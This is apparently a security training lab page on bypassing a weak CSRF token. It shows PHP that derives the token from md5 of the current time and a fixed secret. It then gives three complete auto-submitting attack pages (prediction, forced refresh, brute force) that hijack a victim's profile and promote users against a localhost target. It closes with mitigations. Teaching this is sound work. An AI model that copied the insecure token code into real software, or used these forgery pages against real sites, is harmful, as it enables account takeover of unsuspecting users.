Lab 2: CSRF with Token Bypass

Weak CSRF token implementation

Difficulty: Medium

Lab Overview

This lab demonstrates a CSRF vulnerability whose token protection can be bypassed. The application derives its CSRF token from the server clock and a constant secret that ships with the source, and the validation logic neither expires the token nor stops an attacker from forcing it to rotate.

Objective: Bypass CSRF protection by exploiting weak token generation and validation mechanisms.

Vulnerable Code
<?php
// Vulnerable: Weak CSRF token generation
// The only varying input is the current second; the secret is a constant in
// the source, so anyone who knows (or guesses) the generation second can
// recompute the token.
function generate_weak_token() {
    return md5(time() . 'weak_secret');
}

// Vulnerable: Predictable token validation
// $token is the csrf_token field submitted with the POST, $csrf_token the
// copy held in $_SESSION['csrf_token']. The only check is equality: no
// expiry, no binding to a particular form, and a token stays valid until
// the refresh endpoint replaces it.
if ($token === $csrf_token) {
    // Process request
    $_SESSION['user_profile'] = $new_data;
}

// Vulnerable: Token refresh endpoint
// Reachable by a plain GET, so a cross-site page can force a rotation in
// the victim's session and knows the second in which the new token was minted.
if (isset($_GET['refresh_token'])) {
    $_SESSION['csrf_token'] = generate_weak_token();
    // Token can be predicted by attacker
}
CSRF Protection Status

Current CSRF Token

Token: 564de53ba30aa4504bc72a57fd66f618
Generated: 2026-04-28 06:16:28
Weakness: Predictable MD5 hash based on timestamp

Current Profile

Username: victim_user
Email: victim@example.com
Role: user
Balance: $1,000.00

Protected forms on the page: Profile Update and Admin Actions (both submit a csrf_token field with the POST).
Vulnerability Details
  • Type: CSRF Token Bypass
  • Severity: High
  • Method: POST
  • Issue: Weak CSRF token generation and validation
Bypass Techniques
  • Token Prediction: Recompute md5(<unix seconds> . 'weak_secret') for the second the token was generated; the secret is in the source, so the time is the only unknown
  • Token Refresh: The ?refresh_token=1 GET endpoint rotates the victim's token to a value minted in the current second, so trigger it and predict the result
  • Token Reuse: Any two sessions whose tokens were generated in the same second hold the same token, so the attacker's own session can supply a value that matches the victim's
  • Token Brute Force: When the exact second is unknown, submit the token for every second in a small window; the candidate set is a few dozen values, not 128 bits
CSRF Bypass Techniques

Use these techniques to bypass CSRF protection:

1. Token Prediction Attack:
<html>
<body>
<h1>Token Prediction Attack</h1>
<!-- md5() is not a browser built-in: this page assumes an MD5 implementation
     such as the blueimp-md5 library is loaded from a local copy before the script runs. -->
<script src="md5.min.js"></script>
<script>
// The server computes md5(time() . 'weak_secret'). The secret is known from the
// lab source, so the token for any given second can be recomputed client-side.
// This only matches if the victim's session token was (re)generated in the
// same second as this page runs, e.g. by hitting ?refresh_token=1 first;
// otherwise use the windowed brute force in technique 3.
var timestamp = Math.floor(Date.now() / 1000);
var predictedToken = md5(timestamp + 'weak_secret');

// Build and auto-submit a profile-update form carrying the predicted token.
// The victim's browser attaches their session cookie to the POST.
var form = document.createElement('form');
form.method = 'POST';
form.action = 'http://localhost/test/csrf/2.php';
var inputs = [
    {name: 'update_profile', value: '1'},
    {name: 'csrf_token', value: predictedToken},
    {name: 'username', value: 'hacked_user'},
    {name: 'email', value: 'hacker@evil.com'}
];
inputs.forEach(function(input) {
    var inputElement = document.createElement('input');
    inputElement.type = 'hidden';
    inputElement.name = input.name;
    inputElement.value = input.value;
    form.appendChild(inputElement);
});
document.body.appendChild(form);
form.submit();
</script>
</body>
</html>
2. Token Refresh Attack:
<html>
<body>
<h1>Token Refresh Attack</h1>
<script>
// Step 1: force the victim's session token to rotate through the GET endpoint.
// credentials: 'include' makes the browser send the victim's session cookie.
// Caveat: reading the response body only works when this page is same-origin
// with the lab (both served from http://localhost) or the lab sends permissive
// CORS headers. A truly cross-site page can still trigger the rotation, but
// must then predict the new token from the clock (technique 1) rather than parse it.
fetch('http://localhost/test/csrf/2.php?refresh_token=1', {credentials: 'include'})
    .then(response => response.text())
    .then(data => {
        // Extract the token from the hidden csrf_token field in the response (if visible)
        var tokenMatch = data.match(/csrf_token.*?value="([^"]+)"/);
        if (!tokenMatch) {
            return;
        }
        var token = tokenMatch[1];

        // Step 2: submit the admin action with the freshly minted token.
        var form = document.createElement('form');
        form.method = 'POST';
        form.action = 'http://localhost/test/csrf/2.php';
        var inputs = [
            {name: 'admin_action', value: '1'},
            {name: 'csrf_token', value: token},
            {name: 'action', value: 'promote_user'}
        ];
        inputs.forEach(function(input) {
            var inputElement = document.createElement('input');
            inputElement.type = 'hidden';
            inputElement.name = input.name;
            inputElement.value = input.value;
            form.appendChild(inputElement);
        });
        document.body.appendChild(form);
        form.submit();
    });
</script>
</body>
</html>
3. Token Brute Force Attack:
<html>
<body>
<h1>Token Brute Force Attack</h1>
<!-- md5() is not a browser built-in: this page assumes an MD5 implementation
     such as the blueimp-md5 library is loaded from a local copy before the script runs. -->
<script src="md5.min.js"></script>
<script>
// Brute force the weak token space. The token is md5(<second> . 'weak_secret'),
// so if the generation second lies within +/- 10 s of now there are only 21
// candidates. The session token does not change between attempts unless
// ?refresh_token is hit, so the attempts can be fired concurrently.
function bruteForceToken() {
    var timestamp = Math.floor(Date.now() / 1000);
    // `let` so each callback below sees its own token, not the last loop value.
    for (let i = -10; i <= 10; i++) {
        let testTimestamp = timestamp + i;
        let testToken = md5(testTimestamp + 'weak_secret');
        fetch('http://localhost/test/csrf/2.php', {
            method: 'POST',
            credentials: 'include',
            headers: {'Content-Type': 'application/x-www-form-urlencoded'},
            body: 'update_profile=1&csrf_token=' + testToken + '&username=hacked_user'
        }).then(function(response) {
            return response.text();
        }).then(function(body) {
            // The lab answers 200 whether or not the token matched, so
            // response.ok proves nothing; look for the changed profile in the
            // page instead (only readable when this page is same-origin with
            // the lab). Responses arriving after the successful one will also
            // show the new username, so the first hit is the real match.
            if (body.indexOf('hacked_user') !== -1) {
                console.log('Token found:', testToken, 'for timestamp', testTimestamp);
            }
        });
    }
}
bruteForceToken();
</script>
</body>
</html>
Mitigation Strategies
  • Generate tokens from a CSPRNG (random_bytes() in PHP), at least 128 bits, never from time() or any other guessable input
  • Compare tokens in constant time (hash_equals()), bind them to the session, expire them, and never expose a GET endpoint that rotates the token
  • Set SameSite=Lax or SameSite=Strict on the session cookie so cross-site POSTs arrive without it
  • Double-submit cookie pattern as a stateless alternative, bearing in mind it fails if an attacker can set cookies for the domain (e.g. from a sibling subdomain)
  • Use proper session management and timeout
  • Regular security testing and vulnerability assessments
  • Monitor for bursts of POSTs carrying different csrf_token values from the same session, the signature of the brute-force technique above